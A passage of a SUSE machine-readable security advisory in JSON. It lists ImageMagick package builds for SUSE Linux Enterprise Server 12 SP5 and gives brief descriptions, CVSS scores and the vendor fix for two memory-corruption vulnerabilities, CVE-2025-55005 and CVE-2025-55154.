"name": "perl-PerlMagick-6.8.8.1-71.212.1.x86_64",
"product": {
"name": "perl-PerlMagick-6.8.8.1-71.212.1.x86_64",
"product_id": "perl-PerlMagick-6.8.8.1-71.212.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 12 SP5-LTSS",
"product": {
"name": "SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss:12:sp5"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product": {
"name": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles-ltss-extended-security:12:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64 as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64"
},
"product_reference": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le"
},
"product_reference": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x"
},
"product_reference": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64 as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64"
},
"product_reference": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64 as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64"
},
"product_reference": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le"
},
"product_reference": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x"
},
"product_reference": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64 as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64"
},
"product_reference": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-6.8.8.1-71.212.1.aarch64 as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64"
},
"product_reference": "ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-6.8.8.1-71.212.1.ppc64le as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le"
},
"product_reference": "ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-6.8.8.1-71.212.1.s390x as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x"
},
"product_reference": "ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-6.8.8.1-71.212.1.x86_64 as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64"
},
"product_reference": "ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-6.8.8.1-71.212.1.aarch64 as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64"
},
"product_reference": "libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-6.8.8.1-71.212.1.ppc64le as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le"
},
"product_reference": "libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-6.8.8.1-71.212.1.s390x as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x"
},
"product_reference": "libMagick++-devel-6.8.8.1-71.212.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-6.8.8.1-71.212.1.x86_64 as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64"
},
"product_reference": "libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64 as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64"
},
"product_reference": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le"
},
"product_reference": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x"
},
"product_reference": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64 as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64"
},
"product_reference": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64 as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64"
},
"product_reference": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le"
},
"product_reference": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x"
},
"product_reference": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64 as component of SUSE Linux Enterprise Server 12 SP5-LTSS",
"product_id": "SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
},
"product_reference": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 12 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64 as component of SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64"
},
"product_reference": "ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64 as component of SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64"
},
"product_reference": "ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-6.8.8.1-71.212.1.x86_64 as component of SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64"
},
"product_reference": "ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-6.8.8.1-71.212.1.x86_64 as component of SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64"
},
"product_reference": "libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64 as component of SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64"
},
"product_reference": "libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64 as component of SUSE Linux Enterprise Server LTSS Extended Security 12 SP5",
"product_id": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
},
"product_reference": "libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server LTSS Extended Security 12 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-55005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55005"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to version 7.1.2-1, when preparing to transform from Log to sRGB colorspaces, the logmap construction fails to handle cases where the reference-black or reference-white value is larger than 1024. This leads to corrupting memory beyond the end of the allocated logmap buffer. This issue has been patched in version 7.1.2-1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55005",
"url": "https://www.suse.com/security/cve/CVE-2025-55005"
},
{
"category": "external",
"summary": "SUSE Bug 1248077 for CVE-2025-55005",
"url": "https://bugzilla.suse.com/1248077"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagick++-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickCore-6_Q16-1-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server LTSS Extended Security 12 SP5:libMagickWand-6_Q16-1-6.8.8.1-71.212.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T17:58:50Z",
"details": "important"
}
],
"title": "CVE-2025-55005"
},
{
"cve": "CVE-2025-55154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55154"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-27 and 7.1.2-1, the magnified size calculations in ReadOneMNGIMage (in coders/png.c) are unsafe and can overflow, leading to memory corruption. This issue has been patched in versions 6.9.13-27 and 7.1.2-1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-SUSE-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-config-6-upstream-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.ppc64le",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.s390x",
"SUSE Linux Enterprise Server 12 SP5-LTSS:ImageMagick-devel-6.8.8.1-71.212.1.x86_64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.aarch64",
"SUSE Linux Enterprise Server 12 SP5-LTSS:libMagick++-devel-6.8.8.1-71.212.1.ppc64le",
